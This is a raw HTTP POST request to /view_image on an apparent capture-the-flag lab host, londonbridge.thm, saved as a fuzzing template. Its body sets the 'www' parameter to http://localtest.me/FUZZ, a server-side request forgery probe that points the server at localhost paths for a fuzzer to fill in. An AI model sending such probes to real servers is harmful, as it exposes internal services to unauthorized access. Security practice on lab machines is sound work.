POST /view_image HTTP/1.1
Host: londonbridge.thm:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
Origin: http://londonbridge.thm:8080
Connection: keep-alive
Referer: http://londonbridge.thm:8080/view_image
Upgrade-Insecure-Requests: 1
Priority: u=0, i

www=http://localtest.me/FUZZ
